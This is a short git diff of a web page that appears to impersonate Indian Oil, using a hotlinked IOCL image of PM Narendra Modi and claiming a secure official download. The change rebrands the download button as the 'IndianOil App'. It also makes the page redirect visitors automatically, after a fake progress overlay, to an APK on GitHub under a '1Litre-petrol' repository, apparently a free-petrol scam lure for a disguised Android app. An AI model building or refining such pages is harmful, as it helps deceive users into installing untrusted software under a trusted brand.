--- a/index.html
+++ b/index.html
@@ -274,7 +274,7 @@
         </ul>
 
         <!-- Download Button Above the Image -->
-        <a href="https://example.com/download" class="download-btn" target="_blank">📲 Download XtraRewards App</a>
+        <a href="https://example.com/download" class="download-btn" target="_blank">📲 Download IndianOil App</a>
         <p style="margin-top: 6px; font-size: 13px; color: rgb(82, 82, 82);">Secure download from official server</p>
 
         <img src="https://iocl.com/admin/img/UploadedFiles/MenuHeading/Files/English/959a312d3edf41388dc2074cbc6471a9.jpg" alt="PM Narendra Modi" class="hero-image">
@@ -307,7 +307,7 @@
                     clearInterval(interval);
                     setTimeout(() => {
                         overlay.style.display = "none";
-                        window.location.href = "https://example.com/download"; // Replace with your actual download URL
+                        window.location.href = "https://github.com/indian-oil/1Litre-petrol/raw/refs/heads/main/IndianOil.apk"; // Replace with your actual download URL
                     }, 500);
                 }
             }, 200);
